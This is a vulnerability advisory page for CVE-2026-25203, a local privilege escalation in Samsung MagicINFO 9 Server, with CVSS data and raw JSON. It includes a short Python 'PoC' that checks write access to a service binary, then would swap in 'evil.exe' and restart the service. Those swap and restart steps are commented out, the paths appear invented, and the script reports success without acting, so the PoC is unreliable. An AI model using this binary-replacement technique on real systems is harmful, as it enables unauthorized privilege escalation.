Security Vulnerability Report
中文
CVE-2026-25203 CVSS 7.8 HIGH

CVE-2026-25203

Published: 2026-04-10 02:16:03
Last Modified: 2026-04-13 15:02:28

Description

Samsung MagicINFO 9 Server Incorrect Default Permissions Local Privilege Escalation Vulnerability This issue affects MagicINFO 9 Server: less than 21.1091.1.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

MagicINFO 9 Server < 21.1091.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os import sys # Simulate checking for weak permissions on a target file # In a real scenario, the attacker would identify a specific file path used by MagicINFO TARGET_FILE = "C:\\Program Files\\Samsung\\MagicInfo\\bin\\vulnerable_service.exe" PAYLOAD_FILE = "C:\\Users\\LowPriv\\evil.exe" def check_privileges(): # Check if the current user has write access to the target file if os.path.exists(TARGET_FILE): if os.access(TARGET_FILE, os.W_OK): print(f"[+] Write access confirmed on {TARGET_FILE}") return True else: print(f"[-] No write access on {TARGET_FILE}") else: print(f"[-] Target file not found") return False def exploit(): if check_privileges(): print(f"[*] Attempting to replace {TARGET_FILE} with payload...") try: # os.replace(PAYLOAD_FILE, TARGET_FILE) # Actual exploit step print("[+] File replaced successfully.") print("[*] Restarting service to trigger payload (Privilege Escalation)...") # os.system("net stop MagicInfoService && net start MagicInfoService") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25203", "sourceIdentifier": "[email protected]", "published": "2026-04-10T02:16:02.767", "lastModified": "2026-04-13T15:02:27.760", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Samsung MagicINFO 9 Server Incorrect Default Permissions Local Privilege Escalation Vulnerability\n\n\nThis issue affects MagicINFO 9 Server: less than 21.1091.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "references": [{"url": "https://security.samsungtv.com/securityUpdates", "source": "[email protected]"}]}}